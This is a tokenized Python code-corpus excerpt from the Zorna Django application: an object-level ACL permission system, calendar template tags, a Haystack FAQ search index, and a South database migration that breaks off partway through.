<EOL> return new_class <EOL> new_class . perms = { } <EOL> if not isinstance ( new_class . 
model , ( Model , ModelBase ) ) : <EOL> raise NotAModel ( new_class . model ) <EOL> elif isinstance ( new_class . model , Model ) and not new_class . model . pk : <EOL> raise UnsavedModelInstance ( new_class . model ) <EOL> content_type = ContentType . objects . get_for_model ( new_class . model ) <EOL> current_perms = content_type . model_class ( ) . get_acl_permissions ( ) <EOL> register_acl_for_model ( new_class . model , current_perms ) <EOL> perms = ACLVerbPermission . objects . filter ( content_type = content_type ) <EOL> for perm in perms : <EOL> if current_perms . has_key ( perm . codename ) is False : <EOL> ACLPermission . objects . filter ( permission = perm ) . delete ( ) <EOL> perm . delete ( ) <EOL> continue <EOL> new_class . perms [ perm . codename ] = perm <EOL> func = cls . create_check ( new_class , perm . codename ) <EOL> object_name = new_class . model . _meta . object_name <EOL> func_name = "<STR_LIT>" % ( perm . codename , object_name . lower ( ) ) <EOL> func . short_description = _ ( "<STR_LIT>" ) % { <EOL> '<STR_LIT:object_name>' : new_class . model . _meta . object_name . lower ( ) , <EOL> '<STR_LIT>' : perm . codename } <EOL> func . k = perm . codename <EOL> setattr ( new_class , func_name , func ) <EOL> return new_class <EOL> def create_check ( self , check_name , * args , ** kwargs ) : <EOL> def check ( self , * args , ** kwargs ) : <EOL> granted = self . can ( check_name , * args , ** kwargs ) <EOL> return granted <EOL> return check <EOL> class BaseACL ( object ) : <EOL> model = None <EOL> __metaclass__ = ACLMetaclass <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> super ( BaseACL , self ) . __init__ ( * args , ** kwargs ) <EOL> def get_acl_groups_forms ( self , request , object_id , ** kwargs ) : <EOL> extra_context = { } <EOL> obj = self . model . objects . get ( pk = object_id ) <EOL> ct = ContentType . objects . 
get_for_model ( obj ) <EOL> extra_context [ "<STR_LIT:object_name>" ] = unicode ( obj ) <EOL> try : <EOL> exclude = kwargs [ '<STR_LIT>' ] <EOL> ob_list = UserGroup . objects . exclude ( pk__in = exclude ) . order_by ( '<STR_LIT>' ) <EOL> except : <EOL> ob_list = UserGroup . objects . all ( ) . order_by ( '<STR_LIT>' ) <EOL> template = '<STR_LIT>' <EOL> extra_context [ "<STR_LIT>" ] = None <EOL> perm_object = obj <EOL> if request . method == '<STR_LIT:POST>' : <EOL> if '<STR_LIT>' not in request . POST : <EOL> pr = request . POST . get ( "<STR_LIT>" , None ) <EOL> if pr : <EOL> perm_object = self . model . objects . get ( pk = pr ) <EOL> extra_context [ "<STR_LIT>" ] = perm_object . pk <EOL> else : <EOL> ACLPermission . objects . filter ( <EOL> object_id = obj . pk , content_type = ct , group__isnull = False ) . delete ( ) <EOL> temp = { } <EOL> for ac in request . POST : <EOL> if ac [ : <NUM_LIT:5> ] == '<STR_LIT>' and request . POST [ ac ] != "<STR_LIT>" : <EOL> acc = ac . split ( '<STR_LIT:_>' ) <EOL> try : <EOL> temp [ int ( acc [ <NUM_LIT:2> ] ) ] . append ( ( <EOL> acc [ <NUM_LIT:1> ] , request . POST [ ac ] ) ) <EOL> except KeyError : <EOL> temp [ int ( acc [ <NUM_LIT:2> ] ) ] = [ ] <EOL> temp [ int ( acc [ <NUM_LIT:2> ] ) ] . append ( ( <EOL> acc [ <NUM_LIT:1> ] , request . POST [ ac ] ) ) <EOL> if len ( temp ) : <EOL> grp = UserGroup . objects . in_bulk ( temp . keys ( ) ) <EOL> for g_id , g in grp . iteritems ( ) : <EOL> for c in temp [ g_id ] : <EOL> self . add_perm ( c [ <NUM_LIT:0> ] , obj , g , c [ <NUM_LIT:1> ] ) <EOL> perm_object = obj <EOL> cache . delete ( ACL_USERS_PERMISSIONS_CACHE ) <EOL> cache . delete ( ACL_GROUPS_PERMISSIONS_CACHE ) <EOL> redirect = request . POST . 
get ( '<STR_LIT>' , None ) <EOL> if redirect : <EOL> if '<STR_LIT:?>' not in redirect : <EOL> redirect = redirect + '<STR_LIT>' + str ( object_id ) <EOL> else : <EOL> redirect = redirect + '<STR_LIT>' + str ( object_id ) <EOL> return HttpResponseRedirect ( redirect ) <EOL> extra_context [ "<STR_LIT>" ] = { } <EOL> for k , v in self . perms . iteritems ( ) : <EOL> extra_context [ "<STR_LIT>" ] [ k ] = { } <EOL> extra_context [ "<STR_LIT>" ] [ k ] [ '<STR_LIT:text>' ] = _ ( v . name ) <EOL> perm = ACLPermission . objects . select_related ( ) . filter ( <EOL> object_id = perm_object . pk , content_type = ct , group__isnull = False ) <EOL> parentsid = [ ] <EOL> for ob in ob_list : <EOL> if ob . pk > defines . ZORNA_GROUP_REGISTERED : <EOL> ob . show_members = True <EOL> else : <EOL> ob . show_members = False <EOL> ob . verbs = { } <EOL> for k , v in self . perms . iteritems ( ) : <EOL> ob . verbs [ k ] = '<STR_LIT>' <EOL> for g in perm : <EOL> if g . group_id == ob . id and k == g . permission . codename : <EOL> ob . verbs [ k ] = g . acltype <EOL> if ob . parent_id not in parentsid : <EOL> ob . parent_id = <NUM_LIT:0> <EOL> parentsid . append ( ob . pk ) <EOL> extra_context [ '<STR_LIT>' ] = { } <EOL> perm = ACLPermission . objects . select_related ( ) . filter ( <EOL> content_type = ct , group__isnull = False ) . exclude ( object_id = obj . pk ) <EOL> for p in perm : <EOL> try : <EOL> extra_context [ '<STR_LIT>' ] [ <EOL> p . content_object . pk ] = p . content_object <EOL> except : <EOL> pass <EOL> extra_context [ '<STR_LIT>' ] = request . REQUEST . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> extra_context [ '<STR_LIT:object>' ] = obj <EOL> extra_context [ '<STR_LIT>' ] = ob_list <EOL> context = RequestContext ( request ) <EOL> return render_to_response ( template , extra_context , context_instance = context ) <EOL> def get_acl_users_forms ( self , request , object_id , template = '<STR_LIT>' ) : <EOL> extra_context = { } <EOL> obj = self . model . objects . 
get ( pk = object_id ) <EOL> ct = ContentType . objects . get_for_model ( obj ) <EOL> extra_context [ "<STR_LIT:object_name>" ] = unicode ( obj ) <EOL> acl_template = '<STR_LIT>' <EOL> if request . method == '<STR_LIT:POST>' : <EOL> selected = request . POST . getlist ( '<STR_LIT>' ) <EOL> selected_verbs = request . POST . getlist ( '<STR_LIT>' ) <EOL> ACLPermission . objects . filter ( <EOL> object_id = obj . pk , content_type = ct , user__isnull = False ) . delete ( ) <EOL> ol = User . objects . filter ( pk__in = selected ) <EOL> for u in ol : <EOL> for ac in request . POST : <EOL> if ac [ : <NUM_LIT:5> ] == '<STR_LIT>' and request . POST [ ac ] != "<STR_LIT>" : <EOL> acc = ac . split ( '<STR_LIT:_>' ) <EOL> if acc [ <NUM_LIT:2> ] in selected and long ( acc [ <NUM_LIT:2> ] ) == u . pk : <EOL> self . add_perm ( acc [ <NUM_LIT:1> ] , obj , u , request . POST [ ac ] ) <EOL> u = request . POST . get ( "<STR_LIT:u>" , "<STR_LIT>" ) <EOL> if u : <EOL> u = User . objects . get ( pk = u ) <EOL> check = get_acl_for_model ( obj ) <EOL> for v in selected_verbs : <EOL> check . add_perm ( v , obj , u , defines . ZORNA_PERMISSIONS_ALLOW ) <EOL> cache . delete ( ACL_USERS_PERMISSIONS_CACHE ) <EOL> redirect = request . POST . get ( '<STR_LIT>' , None ) <EOL> if redirect : <EOL> if '<STR_LIT:?>' not in redirect : <EOL> redirect = redirect + '<STR_LIT>' + str ( object_id ) <EOL> else : <EOL> redirect = redirect + '<STR_LIT>' + str ( object_id ) <EOL> return HttpResponseRedirect ( redirect ) <EOL> extra_context [ "<STR_LIT>" ] = { } <EOL> for k , v in self . perms . iteritems ( ) : <EOL> extra_context [ "<STR_LIT>" ] [ k ] = { } <EOL> extra_context [ "<STR_LIT>" ] [ k ] [ '<STR_LIT:text>' ] = _ ( v . name ) <EOL> ob_list = User . objects . filter ( <EOL> aclpermission__user__isnull = False , aclpermission__object_id = obj . pk , aclpermission__content_type = ct ) . distinct ( ) <EOL> perm = ACLPermission . objects . select_related ( ) . filter ( <EOL> object_id = obj . 
pk , content_type = ct , user__isnull = False ) <EOL> dummy = ob_list <EOL> for ob in dummy : <EOL> ob . verbs = { } <EOL> for k , v in self . perms . iteritems ( ) : <EOL> ob . verbs [ k ] = '<STR_LIT>' <EOL> for g in perm : <EOL> if g . user_id == ob . id and k == g . permission . codename : <EOL> ob . verbs [ k ] = g . acltype <EOL> extra_context [ '<STR_LIT>' ] = dummy <EOL> extra_context [ '<STR_LIT:object>' ] = obj <EOL> extra_context [ '<STR_LIT>' ] = request . REQUEST . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> paginate_by = <NUM_LIT:20> <EOL> paginator = Paginator ( <EOL> ob_list . _clone ( ) , paginate_by , allow_empty_first_page = True ) <EOL> page = request . GET . get ( '<STR_LIT>' , <NUM_LIT:1> ) <EOL> try : <EOL> page_number = int ( page ) <EOL> except ValueError : <EOL> if page == '<STR_LIT>' : <EOL> page_number = paginator . num_pages <EOL> else : <EOL> raise Http404 <EOL> try : <EOL> page_obj = paginator . page ( page_number ) <EOL> except InvalidPage : <EOL> raise Http404 <EOL> extra_context [ '<STR_LIT>' ] = paginator <EOL> extra_context [ '<STR_LIT>' ] = page_obj <EOL> extra_context [ '<STR_LIT>' ] = render_to_string ( <EOL> acl_template , extra_context , context_instance = RequestContext ( request ) ) <EOL> context = RequestContext ( request ) <EOL> if template : <EOL> return render_to_response ( template , extra_context , context_instance = context ) <EOL> else : <EOL> return extra_context <EOL> def has_user_perms ( self , perm , obj , user ) : <EOL> if user . is_superuser : <EOL> return True <EOL> return ACLPermission . objects . user_permissions ( user , obj , perm ) <EOL> def has_group_perms ( self , perm , obj , group ) : <EOL> perms = ACLPermission . objects . group_permissions ( group , obj , perm ) <EOL> return perms <EOL> def can ( self , check , obj , user_or_group , * args , ** kwargs ) : <EOL> if isinstance ( user_or_group , User ) or isinstance ( user_or_group , AnonymousUser ) : <EOL> return self . has_user_perms ( self . 
perms [ check ] , obj , user_or_group ) <EOL> if isinstance ( user_or_group , UserGroup ) : <EOL> return self . has_group_perms ( self . perms [ check ] , obj , user_or_group ) <EOL> def add_perm ( self , check , obj , user_or_group , acltype ) : <EOL> kwargs = { } <EOL> if isinstance ( user_or_group , User ) : <EOL> kwargs [ '<STR_LIT:user>' ] = user_or_group <EOL> elif isinstance ( user_or_group , UserGroup ) : <EOL> kwargs [ '<STR_LIT>' ] = user_or_group <EOL> else : <EOL> return None <EOL> content_type = ContentType . objects . get_for_model ( obj ) <EOL> kwargs [ '<STR_LIT>' ] = self . perms [ check ] <EOL> kwargs [ '<STR_LIT>' ] = obj . pk <EOL> kwargs [ '<STR_LIT>' ] = content_type <EOL> kwargs [ '<STR_LIT>' ] = acltype <EOL> acl = ACLPermission . objects . get_or_create ( ** kwargs ) <EOL> cache . delete ( ACL_USERS_PERMISSIONS_CACHE ) <EOL> cache . delete ( ACL_GROUPS_PERMISSIONS_CACHE ) <EOL> return acl <EOL> def remove_perm ( self , check , obj , user_or_group , acltype ) : <EOL> kwargs = { } <EOL> if isinstance ( user_or_group , User ) : <EOL> kwargs [ '<STR_LIT:user>' ] = user_or_group <EOL> elif isinstance ( user_or_group , UserGroup ) : <EOL> kwargs [ '<STR_LIT>' ] = user_or_group <EOL> else : <EOL> return False <EOL> content_type = ContentType . objects . get_for_model ( obj ) <EOL> ACLPermission . objects . filter ( <EOL> object_id = obj . pk , content_type = content_type , user = user_or_group , permission = self . perms [ check ] ) . delete ( ) <EOL> cache . delete ( ACL_USERS_PERMISSIONS_CACHE ) <EOL> cache . delete ( ACL_GROUPS_PERMISSIONS_CACHE ) <EOL> return True </s>
<s> import datetime <EOL> from django import template <EOL> from django . template import TemplateSyntaxError <EOL> from django . contrib . auth . models import User <EOL> from django . template import Variable <EOL> from django . core . urlresolvers import reverse <EOL> from schedule . models . events import EventRelation <EOL> from schedule . periods import Period <EOL> from zorna . acl . models import get_allowed_objects <EOL> from zorna . calendars . models import EventDetails , ZornaResourceCalendar <EOL> from zorna . calendars . api import get_resource_calendar , get_events_for_object , get_user_calendars <EOL> register = template . Library ( ) <EOL> def get_last_day_of_month ( year , month ) : <EOL> if ( month == <NUM_LIT:12> ) : <EOL> year += <NUM_LIT:1> <EOL> month = <NUM_LIT:1> <EOL> else : <EOL> month += <NUM_LIT:1> <EOL> return datetime . date ( year , month , <NUM_LIT:1> ) - datetime . timedelta ( <NUM_LIT:1> ) <EOL> def month_cal ( context , year , month ) : <EOL> request = context [ '<STR_LIT>' ] <EOL> ret = [ ] <EOL> if request . user . is_authenticated ( ) : <EOL> evt = EventRelation . objects . get_events_for_object ( request . user ) <EOL> period = Period ( events = evt , start = datetime . datetime ( year , month , <NUM_LIT:1> ) , <EOL> end = datetime . datetime ( year , month , <NUM_LIT:30> ) ) <EOL> occurrences = [ ] <EOL> for o in period . occurrences : <EOL> if period . classify_occurrence ( o ) : <EOL> occurrences . append ( o ) <EOL> first_day_of_month = datetime . date ( year , month , <NUM_LIT:1> ) <EOL> last_day_of_month = get_last_day_of_month ( year , month ) <EOL> first_day_of_calendar = first_day_of_month - datetime . timedelta ( first_day_of_month . weekday ( ) ) <EOL> last_day_of_calendar = last_day_of_month + datetime . timedelta ( <NUM_LIT:7> - last_day_of_month . 
weekday ( ) ) <EOL> month_cal = [ ] <EOL> week = [ ] <EOL> week_headers = [ ] <EOL> i = <NUM_LIT:0> <EOL> day = first_day_of_calendar <EOL> while day <= last_day_of_calendar : <EOL> if i < <NUM_LIT:7> : <EOL> week_headers . append ( day ) <EOL> cal_day = { } <EOL> cal_day [ '<STR_LIT>' ] = day <EOL> cal_day [ '<STR_LIT>' ] = False <EOL> for occ in ret : <EOL> if day >= occ . start . date ( ) and day <= occ . end . date ( ) : <EOL> cal_day [ '<STR_LIT>' ] = True <EOL> if day . month == month : <EOL> cal_day [ '<STR_LIT>' ] = True <EOL> else : <EOL> cal_day [ '<STR_LIT>' ] = False <EOL> week . append ( cal_day ) <EOL> if day . weekday ( ) == <NUM_LIT:6> : <EOL> month_cal . append ( week ) <EOL> week = [ ] <EOL> i += <NUM_LIT:1> <EOL> day += datetime . timedelta ( <NUM_LIT:1> ) <EOL> return { '<STR_LIT>' : month_cal , '<STR_LIT>' : week_headers } <EOL> register . inclusion_tag ( <EOL> '<STR_LIT>' , takes_context = True ) ( month_cal ) <EOL> @ register . tag ( name = "<STR_LIT>" ) <EOL> def user_calendar_events ( parser , token ) : <EOL> '''<STR_LIT>''' <EOL> bits = token . split_contents ( ) <EOL> if <NUM_LIT:5> != len ( bits ) : <EOL> raise TemplateSyntaxError ( '<STR_LIT>' % bits [ <NUM_LIT:0> ] ) <EOL> if bits [ - <NUM_LIT:2> ] != '<STR_LIT>' : <EOL> raise TemplateSyntaxError ( <EOL> '<STR_LIT>' % bits [ <NUM_LIT:0> ] ) <EOL> cal_date = bits [ <NUM_LIT:1> ] <EOL> limit = bits [ <NUM_LIT:2> ] <EOL> varname = bits [ - <NUM_LIT:1> ] <EOL> return user_calendar_events_node ( cal_date , limit , varname ) <EOL> class user_calendar_events_node ( template . Node ) : <EOL> def __init__ ( self , cal_date , limit , var_name ) : <EOL> sd = cal_date [ <NUM_LIT:1> : - <NUM_LIT:1> ] <EOL> if sd : <EOL> sd = map ( int , sd . split ( '<STR_LIT:->' ) ) <EOL> start_date = datetime . datetime ( sd [ <NUM_LIT:0> ] , sd [ <NUM_LIT:1> ] , sd [ <NUM_LIT:2> ] ) <EOL> else : <EOL> start_date = datetime . datetime . today ( ) <EOL> limits = limit [ <NUM_LIT:1> : - <NUM_LIT:1> ] . 
split ( '<STR_LIT:U+002C>' ) <EOL> self . start_date = start_date - datetime . timedelta ( days = int ( limits [ <NUM_LIT:0> ] ) ) <EOL> self . end_date = start_date + datetime . timedelta ( days = int ( limits [ <NUM_LIT:1> ] ) ) <EOL> self . var_name = var_name <EOL> def render ( self , context ) : <EOL> request = context [ '<STR_LIT>' ] <EOL> events_list = [ ] <EOL> if request . user . is_authenticated ( ) : <EOL> events_list = get_events_for_object ( <EOL> User . objects . get ( pk = request . user . pk ) , <EOL> self . start_date , self . end_date ) <EOL> context [ self . var_name ] = events_list <EOL> return '<STR_LIT>' <EOL> @ register . tag ( name = "<STR_LIT>" ) <EOL> def resource_calendar_events ( parser , token ) : <EOL> '''<STR_LIT>''' <EOL> bits = token . split_contents ( ) <EOL> if <NUM_LIT:6> != len ( bits ) : <EOL> raise TemplateSyntaxError ( '<STR_LIT>' % bits [ <NUM_LIT:0> ] ) <EOL> if bits [ - <NUM_LIT:2> ] != '<STR_LIT>' : <EOL> raise TemplateSyntaxError ( <EOL> '<STR_LIT>' % bits [ <NUM_LIT:0> ] ) <EOL> cal_date = bits [ - <NUM_LIT:4> ] <EOL> limit = bits [ - <NUM_LIT:3> ] <EOL> varname = bits [ - <NUM_LIT:1> ] <EOL> cal_id = int ( bits [ <NUM_LIT:1> ] [ <NUM_LIT:1> : - <NUM_LIT:1> ] ) <EOL> return resource_calendar_events_node ( cal_id , cal_date , limit , varname ) <EOL> class resource_calendar_events_node ( template . Node ) : <EOL> def __init__ ( self , cal_id , cal_date , limit , var_name ) : <EOL> sd = cal_date [ <NUM_LIT:1> : - <NUM_LIT:1> ] <EOL> if sd : <EOL> sd = map ( int , sd . split ( '<STR_LIT:->' ) ) <EOL> start_date = datetime . datetime ( sd [ <NUM_LIT:0> ] , sd [ <NUM_LIT:1> ] , sd [ <NUM_LIT:2> ] ) <EOL> else : <EOL> start_date = datetime . datetime . today ( ) <EOL> limits = limit [ <NUM_LIT:1> : - <NUM_LIT:1> ] . split ( '<STR_LIT:U+002C>' ) <EOL> self . start_date = start_date - datetime . timedelta ( days = int ( limits [ <NUM_LIT:0> ] ) ) <EOL> self . end_date = start_date + datetime . 
timedelta ( days = int ( limits [ <NUM_LIT:1> ] ) ) <EOL> self . var_name = var_name <EOL> self . cal_id = cal_id <EOL> def render ( self , context ) : <EOL> request = context [ '<STR_LIT>' ] <EOL> events_list = [ ] <EOL> try : <EOL> resource = ZornaResourceCalendar . objects . get ( pk = self . cal_id ) <EOL> calendar = get_resource_calendar ( resource ) <EOL> ao = get_allowed_objects ( request . user , type ( calendar ) , '<STR_LIT>' ) <EOL> if calendar . pk in ao : <EOL> events_list = get_events_for_object ( <EOL> resource , self . start_date , self . end_date ) <EOL> except : <EOL> pass <EOL> context [ self . var_name ] = events_list <EOL> return '<STR_LIT>' <EOL> @ register . tag ( name = "<STR_LIT>" ) <EOL> def calendar_events_for_object ( parser , token ) : <EOL> '''<STR_LIT>''' <EOL> bits = token . split_contents ( ) <EOL> if <NUM_LIT:6> != len ( bits ) : <EOL> raise TemplateSyntaxError ( '<STR_LIT>' % bits [ <NUM_LIT:0> ] ) <EOL> if bits [ - <NUM_LIT:2> ] != '<STR_LIT>' : <EOL> raise TemplateSyntaxError ( <EOL> '<STR_LIT>' % bits [ <NUM_LIT:0> ] ) <EOL> cal_date = bits [ - <NUM_LIT:4> ] <EOL> limit = bits [ - <NUM_LIT:3> ] <EOL> varname = bits [ - <NUM_LIT:1> ] <EOL> zornaobject = bits [ <NUM_LIT:1> ] <EOL> return calendar_events_for_object_node ( zornaobject , cal_date , limit , varname ) <EOL> class calendar_events_for_object_node ( template . Node ) : <EOL> def __init__ ( self , zornaobject , cal_date , limit , var_name ) : <EOL> sd = cal_date [ <NUM_LIT:1> : - <NUM_LIT:1> ] <EOL> if sd : <EOL> sd = map ( int , sd . split ( '<STR_LIT:->' ) ) <EOL> start_date = datetime . datetime ( sd [ <NUM_LIT:0> ] , sd [ <NUM_LIT:1> ] , sd [ <NUM_LIT:2> ] ) <EOL> else : <EOL> start_date = datetime . datetime . today ( ) <EOL> limits = limit [ <NUM_LIT:1> : - <NUM_LIT:1> ] . split ( '<STR_LIT:U+002C>' ) <EOL> self . start_date = start_date - datetime . timedelta ( days = int ( limits [ <NUM_LIT:0> ] ) ) <EOL> self . end_date = start_date + datetime . 
timedelta ( days = int ( limits [ <NUM_LIT:1> ] ) ) <EOL> self . var_name = var_name <EOL> self . zornaobject = Variable ( zornaobject ) <EOL> def render ( self , context ) : <EOL> request = context [ '<STR_LIT>' ] <EOL> events_list = [ ] <EOL> try : <EOL> zornaobject = self . zornaobject . resolve ( context ) <EOL> events_list = get_events_for_object ( <EOL> zornaobject , self . start_date , self . end_date ) <EOL> except Exception as e : <EOL> pass <EOL> context [ self . var_name ] = events_list <EOL> return '<STR_LIT>' <EOL> class resource_calendars ( template . Node ) : <EOL> def __init__ ( self , var_name , perm ) : <EOL> self . var_name = var_name <EOL> self . perm = perm <EOL> def render ( self , context ) : <EOL> request = context [ '<STR_LIT>' ] <EOL> calendars = get_user_calendars ( request . user , self . perm ) <EOL> context [ self . var_name ] = [ cal for cal in calendars if type ( cal . content_object ) == ZornaResourceCalendar ] <EOL> for cal in context [ self . var_name ] : <EOL> cal . name = cal . content_object . name <EOL> cal . description = cal . content_object . description <EOL> cal . url = reverse ( '<STR_LIT>' , args = [ cal . pk ] ) <EOL> return '<STR_LIT>' <EOL> @ register . tag ( name = "<STR_LIT>" ) <EOL> def get_resource_calendars ( parser , token ) : <EOL> '''<STR_LIT>''' <EOL> bits = token . split_contents ( ) <EOL> if len ( bits ) not in [ <NUM_LIT:3> , <NUM_LIT:4> ] : <EOL> raise TemplateSyntaxError ( '<STR_LIT>' % bits [ <NUM_LIT:0> ] ) <EOL> if bits [ - <NUM_LIT:2> ] != '<STR_LIT>' : <EOL> raise TemplateSyntaxError ( <EOL> '<STR_LIT>' % bits [ <NUM_LIT:0> ] ) <EOL> varname = bits [ - <NUM_LIT:1> ] <EOL> if len ( bits ) == <NUM_LIT:4> : <EOL> perm = bits [ <NUM_LIT:1> ] . split ( '<STR_LIT:U+002C>' ) <EOL> else : <EOL> perm = [ '<STR_LIT>' ] <EOL> return resource_calendars ( varname , perm ) </s>
import datetime

from haystack import indexes
from haystack import site

from zorna.faq.models import FaqQuestion


class FaqQuestionIndex(indexes.SearchIndex):
    """Haystack search index covering FaqQuestion records."""

    # Primary document field, rendered from a search template.
    text = indexes.CharField(document=True, use_template=True)
    faq_name = indexes.CharField()
    faq = indexes.CharField()
    category = indexes.CharField()

    def get_model(self):
        # Model class this index is responsible for.
        return FaqQuestion

    def get_updated_field(self):
        # Name of the timestamp field used for incremental index updates.
        return '<STR_LIT>'

    def index_queryset(self):
        """Return the queryset of questions eligible for indexing."""
        cutoff = datetime.datetime.now()
        return self.get_model().objects.filter(time_updated__lte=cutoff)

    def prepare(self, obj):
        # Extend the default prepared data with denormalized FAQ and
        # category attributes so they are searchable/filterable directly.
        data = super(FaqQuestionIndex, self).prepare(obj)
        parent_category = obj.category
        parent_faq = parent_category.faq
        data['<STR_LIT>'] = parent_faq.name
        data['<STR_LIT>'] = str(parent_faq.pk)
        data['<STR_LIT>'] = parent_category.name
        self.prepared_data = data
        return self.prepared_data


site.register(FaqQuestion, FaqQuestionIndex)
<s> import datetime <EOL> from south . db import db <EOL> from south . v2 import SchemaMigration <EOL> from django . db import models <EOL> from django . db import connection <EOL> class Migration ( SchemaMigration ) : <EOL> def forwards ( self , orm ) : <EOL> db . start_transaction ( ) <EOL> cursor = connection . cursor ( ) <EOL> cursor . execute ( '<STR_LIT>' ) <EOL> qs = cursor . fetchall ( ) <EOL> db . create_table ( '<STR_LIT>' , ( <EOL> ( '<STR_LIT:id>' , self . gf ( '<STR_LIT>' ) ( primary_key = True ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( to = orm [ '<STR_LIT>' ] , null = True ) ) , <EOL> ( '<STR_LIT:url>' , self . gf ( '<STR_LIT>' ) ( max_length = <NUM_LIT:255> ) ) , <EOL> ) ) <EOL> db . send_create_signal ( '<STR_LIT>' , [ '<STR_LIT>' ] ) <EOL> db . create_table ( '<STR_LIT>' , ( <EOL> ( '<STR_LIT:id>' , self . gf ( '<STR_LIT>' ) ( primary_key = True ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( to = orm [ '<STR_LIT>' ] , null = True ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( to = orm [ '<STR_LIT>' ] ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( ) ) , <EOL> ) ) <EOL> db . send_create_signal ( '<STR_LIT>' , [ '<STR_LIT>' ] ) <EOL> db . create_table ( '<STR_LIT>' , ( <EOL> ( '<STR_LIT:id>' , self . gf ( '<STR_LIT>' ) ( primary_key = True ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( to = orm [ '<STR_LIT>' ] , null = True ) ) , <EOL> ( '<STR_LIT:message>' , self . gf ( '<STR_LIT>' ) ( ) ) , <EOL> ) ) <EOL> db . send_create_signal ( '<STR_LIT>' , [ '<STR_LIT>' ] ) <EOL> db . delete_column ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> from django . contrib . contenttypes . management import update_contenttypes <EOL> from django . db . models import get_app , get_models <EOL> update_contenttypes ( get_app ( '<STR_LIT>' ) , get_models ( ) ) <EOL> if not db . dry_run : <EOL> db . commit_transaction ( ) <EOL> db . start_transaction ( ) <EOL> ct = orm [ '<STR_LIT>' ] . objects . 
get ( app_label = "<STR_LIT>" , model = "<STR_LIT>" ) <EOL> for form in qs : <EOL> rep = orm . FormsFormActionMessage ( message = form [ <NUM_LIT> ] , form_id = form [ <NUM_LIT:0> ] ) <EOL> rep . save ( ) <EOL> orm . FormsFormAction . objects . create ( form_id = form [ <NUM_LIT:0> ] , object_id = rep . pk , content_type = ct ) <EOL> db . commit_transaction ( ) <EOL> def backwards ( self , orm ) : <EOL> db . delete_table ( '<STR_LIT>' ) <EOL> db . delete_table ( '<STR_LIT>' ) <EOL> db . delete_table ( '<STR_LIT>' ) <EOL> db . add_column ( '<STR_LIT>' , '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( default = '<STR_LIT>' ) , keep_default = False ) <EOL> models = { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:email>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] 
, { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:password>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:username>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT>' : "<STR_LIT>" , 